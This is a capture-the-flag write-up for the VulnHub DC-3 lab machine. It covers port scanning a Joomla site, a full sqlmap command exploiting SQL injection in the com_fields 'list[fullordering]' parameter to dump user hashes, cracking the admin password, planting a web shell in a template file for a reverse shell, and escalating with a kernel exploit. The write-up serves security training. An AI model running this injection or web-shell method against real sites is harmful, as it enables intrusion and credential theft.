CTF-Writeups/VulnHub/DC-3.md

Vulnhub-DC 3

Rustscan

rustscan -a 192.168.1.10 -- -A -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.           
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |                  
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |                  
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'                                                                                            
The Modern Day Port Scanner.                                              
________________________________________                                                                                                            
: https://discord.gg/GFrQsGy           :                                                                                                            
: https://github.com/RustScan/RustScan :                                                                                                            
 --------------------------------------                                                                                                             
Open 192.168.1.10:80                                                   

PORT   STATE SERVICE REASON         VERSION                               
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA          
|_http-generator: Joomla! - Open Source Content Management
| http-methods:      
|_  Supported Methods: GET HEAD POST OPTIONS                              
|_http-server-header: Apache/2.4.18 (Ubuntu)                              
|_http-title: Home                                                        
MAC Address: 08:00:27:99:17:ED (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port                                               
Device type: general purpose                                              
Running: Linux 3.X|4.X                                         
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4                                             

PORT 80 (HTTP)

This is a joomla CMS , which can be identified if you have wappalyzer extension installed

So I ran diresarch but found nothing interesting

I went to google for any exploits available for joomla and found one metasploit module

But this exploit didn't work

So searched again to find any exploits and came across sql injection for joomla

After sometime it came back with databases

Now let's select joomladb database and see it's tables

It will start to retrieve the tables from the database

Now we are interested in users table

I tried to enumerate for columns in table but couldn't

Then went with guessing the column name to be name and it returned an entry in the table so the next column could be password

sqlmap -u "http://192.168.1.10/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=
updatexml" --risk=3 --level=5 --random-agent --dbs -p 'list[fullordering]' -D 'joomladb' --tables -T '#__users' --columns -C name,password --dump --
batch

The hash looks like bcrypt so let's try cracking it with john

We can now login to joomla with admin:snoopy

To get a reverse shell , go to Extensions -> Templates

And edit the error.php file

Now you just need to to navigate to that file , /templates/beez3/error.php

But this didn't work let's try to add a simple command injection paramter

Now we have a rce ,just need to get a reverse shell

We have a shell great ! , so now let's run linpeas

Right off the bat it shows that it's using an old linux kernel so there is an exploit available

Download and transfer the exploit to traget machine make sure to covert it to unix format using dos2unix

After compiling and running ,it didn't worked

I searched again for an exploit and found one

After running it crashed : |

Then found another exploit

We need to just run compile.sh after that run the binary doubleput